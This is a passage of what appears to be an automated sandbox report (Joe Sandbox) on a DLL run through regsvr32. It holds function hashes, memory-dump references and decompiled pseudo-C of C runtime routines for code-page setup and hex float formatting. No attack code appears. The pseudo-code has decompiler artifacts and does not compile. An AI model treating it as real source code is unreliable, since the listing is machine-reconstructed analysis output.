                                                                              Function 0000000180010250 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 27A$Cm)X
                                                                              • API String ID: 0-3608389941
                                                                              • Opcode ID: e0490a94f28e6ce23732593848f5f9e9112bddaf8c3b402d699b48d1b456956c
                                                                              • Instruction ID: 684b918ddde8746cffb287e87a4350d0062747792986074a3c358ea6f2ed809a
                                                                              • Opcode Fuzzy Hash: e0490a94f28e6ce23732593848f5f9e9112bddaf8c3b402d699b48d1b456956c
                                                                              • Instruction Fuzzy Hash: 15316FB46187848B8348DF28D59551ABBE5FBCC308F404B2DF4CAAB360D778D644CB4A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000E8F0 Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ?oCf$Wu
                                                                              • API String ID: 0-2445847193
                                                                              • Opcode ID: b07007c7df8fdcff1a3a12132ff18166943f80f753e521aa0974c7cb649c130d
                                                                              • Instruction ID: 6e752a1dbd70b7d88cda0fb1d20915d08c65693f2945daa64a17bfbf07288bfe
                                                                              • Opcode Fuzzy Hash: b07007c7df8fdcff1a3a12132ff18166943f80f753e521aa0974c7cb649c130d
                                                                              • Instruction Fuzzy Hash: 5E21AEB55187848B83489F28C44A41ABBE0FB8C70DF504B2DF8DAA6260D778D646CB4B
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018001586C Relevance: 2.6, Strings: 2, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0F6 $KO
                                                                              • API String ID: 0-276686719
                                                                              • Opcode ID: 6205ceb11bb6b662748add8c297f1b443fa17d6724776aa75fc58f5dae511f0b
                                                                              • Instruction ID: 15a0bfab9284e0424f8d805b4637dfad6d31782236c6d70db9798c35a47a8228
                                                                              • Opcode Fuzzy Hash: 6205ceb11bb6b662748add8c297f1b443fa17d6724776aa75fc58f5dae511f0b
                                                                              • Instruction Fuzzy Hash: AB21AD755283808FC368DF68C58614BBBF0FB86748F504A1DFAC686261D7B6D805CB47
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800226E0 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p$tSA
                                                                              • API String ID: 0-3551818358
                                                                              • Opcode ID: 99011765d78b2b4d15352d42fcf875ddc55d3d35c100f7abdde6317782da955f
                                                                              • Instruction ID: dafa682f426fd7c4027cc0dc28289443c8a7082daafb3c1476061bf3b97c4e55
                                                                              • Opcode Fuzzy Hash: 99011765d78b2b4d15352d42fcf875ddc55d3d35c100f7abdde6317782da955f
                                                                              • Instruction Fuzzy Hash: 4A2169B45183858BD788DF28C54A50BBBE0BBCD74CF400B2DF4CAA6260D378D644CB4A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10047500 Relevance: 1.8, APIs: 1, Instructions: 279COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 83%
                                                                              			E10047500(signed long long __ecx, void* __eflags, long long __rbx, long long __rdx, signed long long __rdi, long long __rsi, signed long long __rbp, signed char* __r8, signed long long __r10, long long __r12, long long __r13, void* __r14, void* __r15, void* _a24, void* _a32) {
				void* _v8;
				void* _v16;
				long long _v24;
				long long _v32;
				signed int _v48;
				char _v66;
				char _v72;
				signed long long _t118;
				signed char _t120;
				signed long long _t133;
				signed int _t136;
				signed int _t137;
				signed char _t145;
				signed int _t147;
				signed int _t148;
				signed int _t154;
				signed int _t158;
				signed long long _t164;
				signed long long _t165;
				signed long long _t174;
				intOrPtr* _t176;
				signed char* _t178;
				signed char* _t179;
				signed long long _t185;
				void* _t189;
				void* _t191;
				signed long long _t192;
				void* _t194;
				signed char* _t199;
				signed long long _t202;
				void* _t206;
				void* _t207;
				signed long long _t208;
				signed long long _t210;
				signed char* _t211;
				signed long long _t212;
				signed long long _t213;
				signed long long _t216;
				signed long long _t221;
				signed long long _t222;
				signed char* _t223;
				long long _t224;
				signed long long _t225;
				void* _t230;
				void* _t231;

				_t231 = __r15;
				_t230 = __r14;
				_t224 = __r12;
				_t221 = __r10;
				_t211 = __r8;
				_t208 = __rbp;
				_t204 = __rsi;
				_t202 = __rdi;
				_t195 = __rdx;
				_t151 = __ecx;
				_t222 = _t210;
				_t174 =  *0x1006f4c8; // 0x6f13091946cb
				_v48 = _t174 ^ _t210;
				 *((long long*)(_t222 + 0x18)) = __rbx;
				 *((long long*)(_t222 + 0x20)) = __rbp;
				 *((long long*)(_t222 - 8)) = __rsi;
				 *((long long*)(_t222 - 0x10)) = __rdi;
				_t181 = __rdx;
				_t118 = E100473F0(__ecx, _t174 ^ _t210, __rdx, __rdi, __rsi, __rbp, __r8, __r12);
				_t164 = _t118;
				if(_t118 != 0) {
					_v24 = _t224;
					_t165 = 0;
					__eflags = 0;
					_v32 = __r13;
					_t151 = 0;
					_t225 = _t208;
					_t176 = 0x10070160;
					while(1) {
						__eflags =  *_t176 - _t164;
						if( *_t176 == _t164) {
							break;
						}
						_t151 = _t151 + 1;
						_t225 = _t225 + 1;
						_t176 = _t176 + 0x30;
						__eflags = _t151 - 5;
						if(_t151 < 5) {
							continue;
						}
						_t151 = _t164;
						_t133 = GetCPInfo(??, ??);
						__eflags = _t133;
						if(_t133 == 0) {
							__eflags =  *0x10075b60 - _t165; // 0x0
							if(__eflags == 0) {
								L57:
								goto L58;
							}
							_t59 = _t181 + 0x1c; // 0x1c
							_t206 = _t59;
							_t212 = _t202;
							E1003A240(_t133, _t151, 0, _t206,  &_v72, _t212);
							 *(_t181 + 4) = _t165;
							 *(_t181 + 8) = _t165;
							 *(_t181 + 0xc) = _t165;
							 *(_t181 + 0x10) = _t208;
							__eflags = 0x1006fd20;
							 *(_t181 + 0x18) = _t165;
							do {
								_t136 =  *(_t206 + 0x1006fd20) & 0x000000ff;
								_t206 = _t206 + 1;
								_t202 = _t202 - 1;
								__eflags = _t202;
								 *(_t206 - 1) = _t136;
							} while (_t202 != 0);
							_t67 = _t181 + 0x11d; // 0x11d
							_t191 = _t67;
							r8d = 0x80;
							__eflags = 0x1006fd21;
							do {
								_t137 =  *(_t191 + 0x1006fd20) & 0x000000ff;
								_t191 = _t191 + 2;
								_t212 = _t212 - 1;
								__eflags = _t212;
								 *(_t191 - 2) = _t137;
								 *((char*)(_t191 - 1)) =  *(_t191 + 0x1006fd1f) & 0x000000ff;
							} while (_t212 != 0);
							L56:
							__eflags = 0;
							goto L57;
						}
						_t23 = _t181 + 0x1c; // 0x1c
						_t192 = _t23;
						r8d = 0x101;
						E1003A240(_t133, _t151, 0, _t192,  &_v72, _t211);
						__eflags = _v72 - 1;
						 *(_t181 + 4) = _t164;
						 *(_t181 + 0xc) = _t165;
						if(_v72 <= 1) {
							 *(_t181 + 8) = _t165;
							 *(_t181 + 0x10) = _t208;
							 *(_t181 + 0x18) = _t165;
							L55:
							E100470D0(_t164, _t181, _t181, _t202, _t204, _t211, _t221, _t225, 0x10070160, _t230, _t231);
							goto L56;
						}
						__eflags = _v66 - bpl;
						_t199 =  &_v66;
						if(_v66 == bpl) {
							L18:
							_t32 = _t181 + 0x1f; // 0x1f
							_t178 = _t32;
							do {
								 *(_t178 - 1) =  *(_t178 - 1) | 0x00000008;
								 *_t178 =  *_t178 | 0x00000008;
								_t178 =  &(_t178[2]);
								_t192 = _t192 - 1;
								__eflags = _t192;
							} while (_t192 != 0);
							_t151 =  *(_t181 + 4) - 0x3a4;
							__eflags = _t151;
							if(_t151 == 0) {
								 *(_t181 + 8) = 1;
								 *(_t181 + 0xc) = 0x411;
								 *(_t181 + 0x10) = _t208;
								 *(_t181 + 0x18) = _t165;
							} else {
								_t151 = _t151 - 4;
								__eflags = _t151;
								if(_t151 == 0) {
									 *(_t181 + 8) = 1;
									 *(_t181 + 0xc) = 0x804;
									 *(_t181 + 0x10) = _t208;
									 *(_t181 + 0x18) = _t165;
								} else {
									_t151 = _t151 - 0xd;
									__eflags = _t151;
									if(_t151 == 0) {
										 *(_t181 + 8) = 1;
										 *(_t181 + 0xc) = 0x412;
										 *(_t181 + 0x10) = _t208;
										 *(_t181 + 0x18) = _t165;
									} else {
										__eflags = _t151 - 1;
										if(_t151 == 1) {
											 *(_t181 + 8) = 1;
											 *(_t181 + 0xc) = 0x404;
											 *(_t181 + 0x10) = _t208;
											 *(_t181 + 0x18) = _t165;
										} else {
											 *(_t181 + 0xc) = _t165;
											 *(_t181 + 8) = 1;
											 *(_t181 + 0x10) = _t208;
											 *(_t181 + 0x18) = _t165;
										}
									}
								}
							}
							goto L55;
						} else {
							while(1) {
								_t145 = _t199[1] & 0x000000ff;
								__eflags = _t145;
								if(_t145 == 0) {
									goto L18;
								}
								r8d =  *_t199 & 0x000000ff;
								_t154 = _t145 & 0x000000ff;
								__eflags = r8d - _t154;
								if(r8d > _t154) {
									L17:
									_t199 =  &(_t199[2]);
									__eflags =  *_t199 - bpl;
									if( *_t199 != bpl) {
										continue;
									}
									goto L18;
								} else {
									_t31 = _t181 + 0x1d; // 0x1d
									_t179 =  &(_t211[_t31]);
									__eflags = _t154 - r8d + 1;
									do {
										 *_t179 =  *_t179 | 0x00000004;
										_t179 =  &(_t179[1]);
										_t192 = _t192 - 1;
										__eflags = _t192;
									} while (_t192 != 0);
									goto L17;
								}
							}
							goto L18;
						}
					}
					_t73 = _t181 + 0x1c; // 0x1c
					r8d = 0x101;
					E1003A240(_t118, _t151, 0, _t73, _t195, _t211);
					_t223 = 0x10070158;
					r10d = 4;
					_t216 = (_t225 + _t225 * 2 << 4) + 0x10070170;
					__eflags = _t216;
					do {
						__eflags =  *_t216 - bpl;
						_t211 = _t216;
						if( *_t216 == bpl) {
							goto L45;
						}
						while(1) {
							_t120 = _t211[1] & 0x000000ff;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L45;
							}
							_t158 =  *_t211 & 0x000000ff;
							__eflags = _t158 - (_t120 & 0x000000ff);
							if(_t158 > (_t120 & 0x000000ff)) {
								L44:
								_t211 =  &(_t211[2]);
								__eflags =  *_t211 - bpl;
								if( *_t211 != bpl) {
									continue;
								}
								goto L45;
							}
							_t78 = _t181 + 0x1d; // 0x21
							_t189 = _t195 + _t78;
							do {
								_t158 = _t158 + 1;
								_t189 = _t189 + 1;
								 *(_t189 - 1) =  *(_t189 - 1) |  *_t223 & 0x000000ff;
								__eflags = _t158 - (_t211[1] & 0x000000ff);
							} while (_t158 <= (_t211[1] & 0x000000ff));
							goto L44;
						}
						L45:
						_t216 = _t216 + 8;
						_t223 =  &(_t223[1]);
						_t221 = _t221 - 1;
						__eflags = _t221;
					} while (_t221 != 0);
					 *(_t181 + 4) = _t164;
					_t164 = _t164 - 0x3a4;
					__eflags = _t164;
					 *(_t181 + 8) = 1;
					if(_t164 == 0) {
						_t165 = 0x411;
					} else {
						_t164 = _t164 - 4;
						__eflags = _t164;
						if(_t164 == 0) {
							_t165 = 0x804;
						} else {
							_t164 = _t164 - 0xd;
							__eflags = _t164;
							if(_t164 == 0) {
								_t165 = 0x412;
							} else {
								__eflags = _t164 - 1;
								if(_t164 == 1) {
									_t165 = 0x404;
								}
							}
						}
					}
					 *(_t181 + 0xc) = _t165;
					_t185 = _t225 + _t225 * 2 + _t225 + _t225 * 2;
					__eflags = _t185;
					 *(_t181 + 0x10) =  *(0x10070160 + 4 + _t185 * 8) & 0x0000ffff;
					 *((short*)(_t181 + 0x12)) =  *(0x10070160 + 6 + _t185 * 8) & 0x0000ffff;
					 *((short*)(_t181 + 0x14)) =  *(0x10070160 + 8 + _t185 * 8) & 0x0000ffff;
					 *((short*)(_t181 + 0x16)) =  *(0x10070160 + 0xa + _t185 * 8) & 0x0000ffff;
					 *(_t181 + 0x18) =  *(0x10070160 + 0xc + _t185 * 8) & 0x0000ffff;
					 *((short*)(_t181 + 0x1a)) =  *(0x10070160 + 0xe + _t185 * 8) & 0x0000ffff;
					goto L55;
				} else {
					_t6 = _t181 + 0x1c; // 0x1c
					_t207 = _t6;
					_t213 = _t202;
					E1003A240(_t118, __ecx, 0, _t207, __rdx, _t213);
					 *((intOrPtr*)(__rdx + 4)) = 0;
					 *((intOrPtr*)(__rdx + 8)) = 0;
					 *((intOrPtr*)(__rdx + 0xc)) = 0;
					 *(__rdx + 0x10) = _t208;
					 *((intOrPtr*)(__rdx + 0x18)) = 0;
					goto L2;
					do {
						L4:
						_t148 =  *(_t194 + 0x1006fd20) & 0x000000ff;
						_t194 = _t194 + 2;
						_t213 = _t213 - 1;
						 *(_t194 - 2) = _t148;
						 *((char*)(_t194 - 1)) =  *(0x1006fd21 + _t194 - 2) & 0x000000ff;
					} while (_t213 != 0);
					L58:
					return E10038D20(_t151, _v48 ^ _t210);
					L2:
					_t147 =  *(0x1006fd20 + _t207) & 0x000000ff;
					_t207 = _t207 + 1;
					_t202 = _t202 - 1;
					 *(_t207 - 1) = _t147;
					if(_t202 != 0) {
						goto L2;
					} else {
						_t14 = _t181 + 0x11d; // 0x11d
						_t194 = _t14;
						r8d = 0x80;
						goto L4;
					}
				}
			}
















































                                                                              0x10047500
                                                                              0x10047500
                                                                              0x10047500
                                                                              0x10047500
                                                                              0x10047500
                                                                              0x10047500
                                                                              0x10047500
                                                                              0x10047500
                                                                              0x10047500
                                                                              0x10047500
                                                                              0x10047500
                                                                              0x10047507
                                                                              0x10047511
                                                                              0x10047516
                                                                              0x1004751a
                                                                              0x1004751e
                                                                              0x10047522
                                                                              0x10047526
                                                                              0x10047529
                                                                              0x10047530
                                                                              0x10047532
                                                                              0x100475c1
                                                                              0x100475c6
                                                                              0x100475c6
                                                                              0x100475c8
                                                                              0x100475d4
                                                                              0x100475d6
                                                                              0x100475d9
                                                                              0x100475e0
                                                                              0x100475e0
                                                                              0x100475e2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100475e8
                                                                              0x100475eb
                                                                              0x100475ef
                                                                              0x100475f3
                                                                              0x100475f6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100475fd
                                                                              0x100475ff
                                                                              0x10047605
                                                                              0x10047607
                                                                              0x1004773e
                                                                              0x10047744
                                                                              0x100478f9
                                                                              0x00000000
                                                                              0x100478fe
                                                                              0x1004774a
                                                                              0x1004774a
                                                                              0x10047758
                                                                              0x1004775b
                                                                              0x10047760
                                                                              0x10047763
                                                                              0x10047766
                                                                              0x10047770
                                                                              0x10047774
                                                                              0x10047777
                                                                              0x10047780
                                                                              0x10047780
                                                                              0x10047784
                                                                              0x10047788
                                                                              0x10047788
                                                                              0x1004778c
                                                                              0x1004778c
                                                                              0x10047798
                                                                              0x10047798
                                                                              0x1004779f
                                                                              0x100477a5
                                                                              0x100477b0
                                                                              0x100477b0
                                                                              0x100477b4
                                                                              0x100477b8
                                                                              0x100477b8
                                                                              0x100477bc
                                                                              0x100477c5
                                                                              0x100477c5
                                                                              0x100478f7
                                                                              0x100478f7
                                                                              0x00000000
                                                                              0x100478f7
                                                                              0x1004760d
                                                                              0x1004760d
                                                                              0x10047611
                                                                              0x10047619
                                                                              0x1004761e
                                                                              0x10047623
                                                                              0x10047626
                                                                              0x10047629
                                                                              0x1004772f
                                                                              0x10047732
                                                                              0x10047736
                                                                              0x100478ef
                                                                              0x100478f2
                                                                              0x00000000
                                                                              0x100478f2
                                                                              0x1004762f
                                                                              0x10047634
                                                                              0x10047639
                                                                              0x10047676
                                                                              0x10047676
                                                                              0x10047676
                                                                              0x10047680
                                                                              0x10047680
                                                                              0x10047684
                                                                              0x10047687
                                                                              0x1004768b
                                                                              0x1004768b
                                                                              0x1004768b
                                                                              0x10047694
                                                                              0x10047694
                                                                              0x1004769a
                                                                              0x10047714
                                                                              0x10047720
                                                                              0x10047723
                                                                              0x10047727
                                                                              0x1004769c
                                                                              0x1004769c
                                                                              0x1004769c
                                                                              0x1004769f
                                                                              0x100476f9
                                                                              0x10047705
                                                                              0x10047708
                                                                              0x1004770c
                                                                              0x100476a1
                                                                              0x100476a1
                                                                              0x100476a1
                                                                              0x100476a4
                                                                              0x100476de
                                                                              0x100476ea
                                                                              0x100476ed
                                                                              0x100476f1
                                                                              0x100476a6
                                                                              0x100476a6
                                                                              0x100476a9
                                                                              0x100476c3
                                                                              0x100476cf
                                                                              0x100476d2
                                                                              0x100476d6
                                                                              0x100476ab
                                                                              0x100476ab
                                                                              0x100476ae
                                                                              0x100476b5
                                                                              0x100476b9
                                                                              0x100476bc
                                                                              0x100476a9
                                                                              0x100476a4
                                                                              0x1004769f
                                                                              0x00000000
                                                                              0x10047640
                                                                              0x10047640
                                                                              0x10047640
                                                                              0x10047644
                                                                              0x10047646
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10047648
                                                                              0x1004764c
                                                                              0x1004764f
                                                                              0x10047652
                                                                              0x1004766d
                                                                              0x1004766d
                                                                              0x10047671
                                                                              0x10047674
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10047654
                                                                              0x10047657
                                                                              0x10047657
                                                                              0x1004765c
                                                                              0x10047660
                                                                              0x10047660
                                                                              0x10047663
                                                                              0x10047667
                                                                              0x10047667
                                                                              0x10047667
                                                                              0x00000000
                                                                              0x10047660
                                                                              0x10047652
                                                                              0x00000000
                                                                              0x10047640
                                                                              0x10047639
                                                                              0x100477d9
                                                                              0x100477dd
                                                                              0x100477e5
                                                                              0x100477f9
                                                                              0x10047800
                                                                              0x10047806
                                                                              0x10047806
                                                                              0x10047810
                                                                              0x10047810
                                                                              0x10047813
                                                                              0x10047816
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10047820
                                                                              0x10047820
                                                                              0x10047825
                                                                              0x10047827
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10047829
                                                                              0x10047830
                                                                              0x10047832
                                                                              0x10047857
                                                                              0x10047857
                                                                              0x1004785b
                                                                              0x1004785e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004785e
                                                                              0x10047834
                                                                              0x10047834
                                                                              0x10047840
                                                                              0x10047844
                                                                              0x10047847
                                                                              0x1004784b
                                                                              0x10047853
                                                                              0x10047853
                                                                              0x00000000
                                                                              0x10047840
                                                                              0x10047860
                                                                              0x10047860
                                                                              0x10047864
                                                                              0x10047868
                                                                              0x10047868
                                                                              0x10047868
                                                                              0x1004786e
                                                                              0x10047871
                                                                              0x10047871
                                                                              0x10047877
                                                                              0x1004787e
                                                                              0x100478a4
                                                                              0x10047880
                                                                              0x10047880
                                                                              0x10047880
                                                                              0x10047883
                                                                              0x1004789d
                                                                              0x10047885
                                                                              0x10047885
                                                                              0x10047885
                                                                              0x10047888
                                                                              0x10047896
                                                                              0x1004788a
                                                                              0x1004788a
                                                                              0x1004788d
                                                                              0x1004788f
                                                                              0x1004788f
                                                                              0x1004788d
                                                                              0x10047888
                                                                              0x10047883
                                                                              0x100478a9
                                                                              0x100478b0
                                                                              0x100478b0
                                                                              0x100478b9
                                                                              0x100478c3
                                                                              0x100478cd
                                                                              0x100478d7
                                                                              0x100478e1
                                                                              0x100478eb
                                                                              0x00000000
                                                                              0x10047538
                                                                              0x10047538
                                                                              0x10047538
                                                                              0x10047546
                                                                              0x10047549
                                                                              0x10047557
                                                                              0x1004755a
                                                                              0x1004755d
                                                                              0x10047560
                                                                              0x10047567
                                                                              0x10047567
                                                                              0x100475a0
                                                                              0x100475a0
                                                                              0x100475a0
                                                                              0x100475a4
                                                                              0x100475a8
                                                                              0x100475ac
                                                                              0x100475b5
                                                                              0x100475b5
                                                                              0x10047903
                                                                              0x1004792e
                                                                              0x10047570
                                                                              0x10047570
                                                                              0x10047574
                                                                              0x10047578
                                                                              0x1004757c
                                                                              0x1004757f
                                                                              0x00000000
                                                                              0x10047581
                                                                              0x10047588
                                                                              0x10047588
                                                                              0x1004758f
                                                                              0x00000000
                                                                              0x10047595
                                                                              0x1004757f

                                                                              APIs
                                                                                • Part of subcall function 100473F0: GetOEMCP.KERNEL32(?,?,?,?,10047975,?,?,?,?,?,?,?,?,10047B87), ref: 10047498
                                                                              • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,100479BB), ref: 100475FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Info
                                                                              • String ID:
                                                                              • API String ID: 1807457897-0
                                                                              • Opcode ID: 8b67715a84a58faec0584734b2e9caea81cc7172d7dea289ff349af46439247f
                                                                              • Instruction ID: dd2a18faeb4844d25df8a803a4c708ac50b2b95e4229f5b91d7cf56b4abed413
                                                                              • Opcode Fuzzy Hash: 8b67715a84a58faec0584734b2e9caea81cc7172d7dea289ff349af46439247f
                                                                              • Instruction Fuzzy Hash: FCB101B7A087C48AD755CF35D00436DBBA1F305B88FA5802ADB8C87309DB79DA54CB58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10046470 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E10046470(signed int __ecx, long long __rbx, intOrPtr* __rcx, signed int __rdx, long long __rdi, long long __rsi, long long __rbp, signed int __r8, long long __r9, long long __r12, long long __r13, long long __r14, long long __r15, void* _a8, long long _a16, signed int _a40, long long _a48) {
				void* _v8;
				void* _v16;
				void* _v24;
				void* _v32;
				void* _v40;
				void* _v48;
				void* _v56;
				void* _v64;
				signed char _v80;
				signed int* _v88;
				void* _v104;
				long long _v112;
				long long _v120;
				signed int _t101;
				void* _t102;
				void* _t120;
				void* _t121;
				signed int _t122;
				signed int _t123;
				signed int _t138;
				char _t147;
				void* _t149;
				void* _t151;
				signed int* _t158;
				unsigned long long _t161;
				long long _t186;
				signed long long _t190;
				long long _t200;
				signed int _t211;
				char* _t213;
				signed int* _t219;
				signed int* _t223;
				signed int _t227;
				long long _t228;
				signed int _t231;
				signed int* _t235;
				intOrPtr* _t238;
				signed int _t240;

				_t241 = __r15;
				_t228 = __r9;
				_t224 = __r8;
				_t221 = __rbp;
				_t188 = __rcx;
				_t186 = __rbx;
				_t123 = __ecx;
				_a8 = __rcx;
				_t158 = _t223;
				 *((long long*)(_t158 - 8)) = __rbx;
				 *((long long*)(_t158 - 0x10)) = __rbp;
				 *((long long*)(_t158 - 0x18)) = __rsi;
				 *((long long*)(_t158 - 0x20)) = __rdi;
				 *((long long*)(_t158 - 0x28)) = __r12;
				 *((long long*)(_t158 - 0x30)) = __r13;
				 *((long long*)(_t158 - 0x38)) = __r14;
				_t211 = __rdx;
				_t200 = _a48;
				 *((long long*)(_t158 - 0x40)) = __r15;
				r15b = 0;
				_t120 = r9d;
				r9d = 0x3ff;
				_t231 = __r8;
				_t238 = __rcx;
				_t147 = 0x30;
				 *(_t158 - 0x50) = r15b;
				_a16 = __r9;
				if(_t200 != 0) {
					_t188 =  &_v104;
					 *_t188 =  *_t200;
					_t158 =  *((intOrPtr*)(_t200 + 8));
					 *(_t188 + 8) = _t158;
					r15d = _v80 & 0x000000ff;
					_t219 = _v88;
					_t235 = _v104;
					goto L11;
				} else {
					E1003D060(_t158, __rbx, __rcx, _t200, __rdx, __rsi, __rbp, __r8, __r8);
					_t219 = _t158;
					_t235 = _t158[0x30];
					_t240 = _t158[0x2e];
					_t149 = _t235 -  *0x100703d0; // 0x10070270
					if(_t149 != 0) {
						_t135 = _t158[0x32];
						if(( *0x10070258 & _t158[0x32]) == 0) {
							E10047EE0(_t135, _t158, _t188, _t200, __r8, __r8);
							_t235 = _t158;
						}
					}
					_t151 = _t240 -  *0x10070150; // 0x23a5c20
					if(_t151 != 0) {
						_t134 = _t219[0x32];
						if(( *0x10070258 & _t219[0x32]) == 0) {
							E10047300(_t134, _t158, _t186, _t188, _t200, _t211, _t219, _t221, _t231);
						}
					}
					_t123 = _t219[0x32];
					if((_t123 & 0x00000002) != 0) {
						_t238 = _a8;
						r9d = 0x3ff;
					} else {
						_t238 = _a8;
						_t123 = _t123 | 0x00000002;
						r15b = 1;
						_t219[0x32] = _t123;
						r9d = 0x3ff;
					}
					L11:
					_t121 =  <  ? 0 : _t120;
					if(_t211 != 0) {
						__eflags = _t231;
						if(_t231 == 0) {
							goto L12;
						}
						_t102 = _t186 + 0xb;
						 *_t211 = 0;
						_t189 = _t102;
						__eflags = _t231 - _t102;
						if(_t231 > _t102) {
							_t190 =  *_t238;
							_t161 = _t190 >> 0x34;
							__eflags = _t161 - 0x7ff;
							if(_t161 != 0x7ff) {
								__eflags = 0x00000000 & _t190;
								if ((0x00000000 & _t190) == 0) goto 0x100466da;
								 *_t211 = 0x2d;
								_t213 = _t211 + 1;
								_t138 = _a40;
								 *_t213 = 0x30;
								__eflags = _t138;
								r8d = 0x61;
								_t105 =  !=  ? 0x58 : 0x78;
								__eflags = _t138;
								 *((char*)(_t213 + 1)) =  !=  ? 0x58 : 0x78;
								r8d =  !=  ? 0x41 : r8d;
								r8d = r8d - 0x3a;
								__eflags = r8d;
							}
							__eflags = _t231 - 0xffffffff;
							if(__eflags != 0) {
								_t227 = _t231 - 2;
							} else {
								_t227 = _t231;
							}
							_v112 = _t200;
							_v120 = 0;
							r9d = _t121;
							_t101 = E10046330(_t123, 0, __eflags, _t186, _t238, _t211 + 2, _t211, _t219, _t221, _t227, _t228, _t231, _t235, _t238, _t241);
							__eflags = _t101;
							if(_t101 == 0) {
								__eflags =  *((char*)(_t211 + 2)) - 0x2d;
								if( *((char*)(_t211 + 2)) == 0x2d) {
									 *_t211 = 0x2d;
									_t211 = _t211 + 1;
									__eflags = _t211;
								}
								_t122 = _a40;
								 *_t211 = 0x30;
								__eflags = _t122;
								_t113 =  !=  ? 0x58 : 0x78;
								 *(_t211 + 1) =  !=  ? 0x58 : 0x78;
								E1004B0A0(0x65, _t211 + 2);
								__eflags = _t161;
								if(_t161 != 0) {
									__eflags = _t122;
									_t132 =  !=  ? 0x50 : 0x70;
									 *_t161 =  !=  ? 0x50 : 0x70;
									 *((char*)(_t161 + 3)) = 0;
								}
								__eflags = r15b;
								if(__eflags != 0) {
									_t89 =  &(_t219[0x32]);
									 *_t89 = _t219[0x32] & 0xfffffffd;
									__eflags =  *_t89;
								}
								_t101 = 0;
								__eflags = 0;
								goto L74;
							} else {
								__eflags = r15b;
								 *_t211 = 0;
								if(r15b != 0) {
									_t219[0x32] = _t219[0x32] & 0xfffffffd;
								}
								L74:
								return _t101;
							}
						}
						E1003AF40(_t158);
						r9d = 0;
						r8d = 0;
						_v120 = 0;
						 *_t158 = 0x22;
						E1003C790(_t186, _t189, _t200, _t211, _t219, _t221, _t224);
						__eflags = r15b;
						if(r15b != 0) {
							_t38 =  &(_t219[0x32]);
							 *_t38 = _t219[0x32] & 0xfffffffd;
							__eflags =  *_t38;
						}
						_t101 = 0x22;
						goto L74;
					}
					L12:
					E1003AF40(_t158);
					r9d = 0;
					r8d = 0;
					_v120 = 0;
					 *_t158 = 0x16;
					E1003C790(_t186, _t188, _t200, _t211, _t219, _t221, _t224);
					if(r15b != 0) {
						_t219[0x32] = _t219[0x32] & 0xfffffffd;
					}
					_t101 = 0x16;
					goto L74;
				}
			}









































                                                                              0x10046470
                                                                              0x10046470
                                                                              0x10046470
                                                                              0x10046470
                                                                              0x10046470
                                                                              0x10046470
                                                                              0x10046470
                                                                              0x10046470
                                                                              0x10046475
                                                                              0x1004647f
